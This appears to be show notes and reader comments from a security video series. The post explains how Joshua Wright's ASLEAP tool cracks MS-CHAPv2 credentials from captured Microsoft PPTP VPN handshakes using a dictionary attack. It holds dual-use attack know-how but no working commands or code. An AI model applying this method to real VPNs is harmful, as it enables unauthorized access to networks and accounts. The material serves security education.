Darren demonstrates cracking Microsoft VPN tunnels using the MS-CHAPv2 authentication protocol using Joshua Wright’s tool ASLEAP and talks about the theory behind the attack.

Continuing on with our VPN series I find it important to highlight the weaknesses in the protocols we have talked about thus far. In my last segment I highlighted a tool that allows an attacker to easily hijack an SSL session using a man-in-the-middle attack. Couple this with Adito (aka OpenVPN-ALS), my favorite open-source SSL VPN server, and you can see the problem.

But what about the basic Microsoft VPN we setup a few weeks back? The VPN servers that we setup on Windows XP and Server 2003 used either active directory or local windows accounts to authenticate users.

And looking back at our discussions on pwdump, rainbow tables and the like you’ll remember the inherent weaknesses in Windows account credentials.

There are two ways Windows stores a user’s account credentials, or password. LAN Manager hashes which are comprised of watered-down weaksauce and NTLM which are succeptable to time-memory tradeoff attacks.

The default VPN server implemented in Windows XP and Server 2003’s Routing and Remote Access service uses Point-To-Point-Tunneling-Protocol. This is convenient because the Windows clients have supported Microsoft PPTP VPN connections natively since 2000, and in Windows 95/98 with Dual Up Networking version 1.3.

The modern authentication protocol of Microsoft’s PPTP is MS-CHAPv2. This Challenge Handshake Authentication Protocol suffers from inherent weaknesses.

As far back at 1999 these weaknesses have been widely known. If you’re interested in reading more on the cryptanalysis of MS-CHAPv2 there’s a nifty paper written by Bruce Schneier and L0pht that I’ll link in the show notes.

And while other options exist such as Radius, this is still the default option for PPTP authentication in Windows environments.

Joshua Wright, author of coWPAtty (See our segment here), released in 2004 a proof of concept tool to demonstrate weaknesses in LEAP and PPTP protocols.

This tool, ASLEAP, was updated in 2007 to include an option to just crack MS-CHAP v2. Either by examining a packet capture that includes a MS-CHAP handshake ASLEAP or specifying an MS-CHAP challenge and response ASLEAP is able to deduce the username and last two bytes of the NT hash. Using this information, and a dictionary file, ASLEAP is able to brute-force the hash.

Hacking PPTP VPNs with ASLEAP

3 Comments

  • Rolroak
    Reply

    I personally don’t have too much experience hacking, just a lot of research / school. What I would like to say, is this video just as simplistic as your goal was to display the inherent weakness in MSchap. Watching this video allowed me to piece together a lot of my research as to better understand how these different systems work together. I really appreciate all the things you’re doing, explaining, and working on. There is a little something out their for everyone that hits this site that has the techno-lust. You have more advanced stuff for our programmers, links and places to start for us noobs.

    Either way keep up the great work guys.

    an idea, Maybe you should have a segment on what and where to get some of the tools you guys frequently use. ex: special network cards, different programs, the difference between linux hacking and windows hacking the tools that are used for each OS.

    What program languages would be a good to try and learn, that would further our network security careers. Stuff like that. …

    Also any episode without Shannon in it is a sad episode ; ;. I think if she’s ever in Kansas City she should let me take her out to a movie!

    you guys are awesome!

  • bob
    Reply

    some additional information on security flaws with PPTP over IPv6,
    Huge Security Flaw Makes VPNs Useless for BitTorrent.

    The security risk is caused by a lethal combination of IPv6 and PPTP-based VPN services, which are very common. IPv6 is the Internet protocol that will succeed IPv4. The protocol is promoted by Windows 7 and Vista, among others, and most people are using it without even realizing it, we should recommend everyone to use L2TP VPN or SSTP VPN with SSL encryption.

    Great video thanks Darren …..

  • bob
    Reply

    Some additional information on security flaws with PPTP over IPv6, Huge Security Flaw Makes VPNS useless for BitTorrent.

    The security risk is caused by a lethal combination of IPv6 and PPTP-based VPN services, which are very common. IPv6 is the Internet protocol that will succeed IPv4. The protocol is promoted by Windows 7 and Vista, among others, and most people are using it without even realizing it, we should recommend everyone to use L2TP VPN or SSTP VPN with SSL encryption.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>